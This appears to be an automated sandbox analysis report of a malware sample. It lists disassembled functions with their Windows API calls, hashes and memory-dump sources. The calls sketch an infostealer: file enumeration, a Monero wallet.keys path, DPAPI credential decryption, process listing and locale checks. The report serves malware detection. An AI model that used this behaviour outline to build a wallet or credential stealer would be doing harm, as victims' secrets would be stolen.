                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: *cz#$H3W$J:tN$SMs?$aBr3$gw7}$jr$o*v$~\)Q$6z
                        • API String ID: 0-3346293091
                        • Opcode ID: 479a4afa9d8421a3f9714527aefb7799679ae6246f5b592130a1a95c1df80ede
                        • Instruction ID: 3c386dcbfdc7fd36a15b99458b183da9a0ed96c3b4768c043a1696ef24f100fa
                        • Opcode Fuzzy Hash: 479a4afa9d8421a3f9714527aefb7799679ae6246f5b592130a1a95c1df80ede
                        • Instruction Fuzzy Hash: 56B218F360C204AFE304AE29EC8577AFBE5EFD4720F1A853DE6C487744EA3558018696
                        Function 005EDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006014B0,00600C2A), ref: 005EDAEB
                        • StrCmpCA.SHLWAPI(?,006014B4), ref: 005EDB33
                        • StrCmpCA.SHLWAPI(?,006014B8), ref: 005EDB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EDDCC
                        • FindClose.KERNEL32(000000FF), ref: 005EDDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 28fda33163167a47323b32c3a1f0deeded45e36a1541ee6a99782b864d6776d1
                        • Instruction ID: 2cfd2dd32ee4db3a82aefeda7afc0bc8da87a4a0c8f86481bc325627af71a798
                        • Opcode Fuzzy Hash: 28fda33163167a47323b32c3a1f0deeded45e36a1541ee6a99782b864d6776d1
                        • Instruction Fuzzy Hash: 649156B290010997CB18FB70DC5ADFD7B7DBFC4340F408568B94A96195EE78AB098B93
                        Function 005F7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,006005AF), ref: 005F7BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005F7BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 005F7C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 005F7C62
                        • LocalFree.KERNEL32(00000000), ref: 005F7D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 9bcd91c277da76ec1641dc70cfd023347d5b212adaf68aa9c0f47f15d27fc356
                        • Instruction ID: 21764e7ee612722b90f415abc63396f13ce2ac788d2fd53792e62eb604e3b59a
                        • Opcode Fuzzy Hash: 9bcd91c277da76ec1641dc70cfd023347d5b212adaf68aa9c0f47f15d27fc356
                        • Instruction Fuzzy Hash: 0C415EB194011DABDB24DB54DC99BFEBB74FF48700F204199E609A2191DB782F85CFA2
                        Function 005EE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00600D73), ref: 005EE4A2
                        • StrCmpCA.SHLWAPI(?,006014F8), ref: 005EE4F2
                        • StrCmpCA.SHLWAPI(?,006014FC), ref: 005EE508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EEBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: b69f3cf6524d3f439e670d90c00a24a8c38eb02d060142fe32d80c204105dfeb
                        • Instruction ID: 0728db3486261cff9a258997ae2cafecd7d584ec107a338bff12bb15918c0e56
                        • Opcode Fuzzy Hash: b69f3cf6524d3f439e670d90c00a24a8c38eb02d060142fe32d80c204105dfeb
                        • Instruction Fuzzy Hash: 401272B191010E9ADB18FB60DC9AEFD7738BF94340F4041A8B60E56095EE786F49CB93
                        Function 009A4097 Relevance: 9.2, Strings: 6, Instructions: 1665COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: &k&^$=Uo$?LnO$Czm]$ME?$O^y/
                        • API String ID: 0-1676352826
                        • Opcode ID: 9dcc2760106a0574b606cf9974cd0594e83780d46e8159626a633a53a133bc95
                        • Instruction ID: 7b814b64ab3ed4321a7e052861167d2ed9ca2b0a22f6b721a04d74372ae0cd91
                        • Opcode Fuzzy Hash: 9dcc2760106a0574b606cf9974cd0594e83780d46e8159626a633a53a133bc95
                        • Instruction Fuzzy Hash: 9FB24AF390C2109FE3086E2DEC8567ABBE5EF94720F164A3DEAC5D3744EA3558018697
                        Function 005E9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,005E4EEE,00000000,?), ref: 005E9B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9B2A
                        • LocalFree.KERNEL32(?,?,?,?,005E4EEE,00000000,?), ref: 005E9B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: N^
                        • API String ID: 4291131564-102271716
                        • Opcode ID: 71a2ba0f41ab36c1d0d4b95adf8124869537ed176536a41e1731ed66e0d426e8
                        • Instruction ID: 10d277b7304c482eab99587b46fe0351a30776a1eaa98b4a65f11b21e998a4b8
                        • Opcode Fuzzy Hash: 71a2ba0f41ab36c1d0d4b95adf8124869537ed176536a41e1731ed66e0d426e8
                        • Instruction Fuzzy Hash: E111A2B4240208BFEB14CF64DC95FAA77B9FB89700F208058FA159B390C7B6A941CB90
                        Function 005EC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005EC871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005EC87C
                        • lstrcat.KERNEL32(?,00600B46), ref: 005EC943
                        • lstrcat.KERNEL32(?,00600B47), ref: 005EC957
                        • lstrcat.KERNEL32(?,00600B4E), ref: 005EC978
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 6545640befff87e0e9e4949112d4c90b824e1217dc6b35a431bacf1f37ba424d
                        • Instruction ID: 6f9e5f0cb5138bbf5b48af152cfe9a6088dcc63a7de00267f3a139dc534cb04f
                        • Opcode Fuzzy Hash: 6545640befff87e0e9e4949112d4c90b824e1217dc6b35a431bacf1f37ba424d
                        • Instruction Fuzzy Hash: 3B41737590421AEFDB14CFA0DC89BEEBBB8BF44304F1045A8E509A6280D7749A85CF91
                        Function 005F6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 005F696C
                        • sscanf.NTDLL ref: 005F6999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005F69B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005F69C0
                        • ExitProcess.KERNEL32 ref: 005F69DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 4ddcf7b599673e4a581226aaa72372481e8ecb3c501fa4a2958b9e660f0a2180
                        • Instruction ID: 455c131e5be6d8e57011c4591576bf2ad289e13d9fc5397592bfa57ef776d5ea
                        • Opcode Fuzzy Hash: 4ddcf7b599673e4a581226aaa72372481e8ecb3c501fa4a2958b9e660f0a2180
                        • Instruction Fuzzy Hash: 9221EAB5D1020DABCF08EFE4D9459EEBBB5FF48300F04852AE506E3254EB749605CB69
                        Function 005E7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 005E724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005E7254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005E7281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005E72A4
                        • LocalFree.KERNEL32(?), ref: 005E72AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 8589eca7077af2a24f645c16bd4c53cc1b35754de6b79fb41617d3b908efbf04
                        • Instruction ID: 0b97bbcdecdffa895209d3cb24f1d49399da1fcef0fd739492ca180dbf351fb1
                        • Opcode Fuzzy Hash: 8589eca7077af2a24f645c16bd4c53cc1b35754de6b79fb41617d3b908efbf04
                        • Instruction Fuzzy Hash: DB010075A40208BBEB28DFD4DD46F9E7BB9BF44700F108555FB05AA2C0D770AA018B65
                        Function 005F9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005F961E
                        • Process32First.KERNEL32(00600ACA,00000128), ref: 005F9632
                        • Process32Next.KERNEL32(00600ACA,00000128), ref: 005F9647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 005F965C
                        • CloseHandle.KERNEL32(00600ACA), ref: 005F967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: e7e9dedf1d74335e470326ac317dbe2daef3330adc0e84037a5555b1245dd5ea
                        • Instruction ID: 2b2f13bfa180fba1774d6cabf45a1df3e81b99df9edff15e1a24cb1c61e878ac
                        • Opcode Fuzzy Hash: e7e9dedf1d74335e470326ac317dbe2daef3330adc0e84037a5555b1245dd5ea
                        • Instruction Fuzzy Hash: 37010C75A00208EBCB24DFA5CD48BEDBBF8FF48700F108598AA05E6240DB349B45CF51
                        Function 009AC597 Relevance: 6.7, Strings: 4, Instructions: 1727COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !z/$Xh3.$Xv&$a&~o
                        • API String ID: 0-3215016525
                        • Opcode ID: 0665eac30637b88fd087c6a6bff9d142405be371555b7fd777c47ade1b5834e8
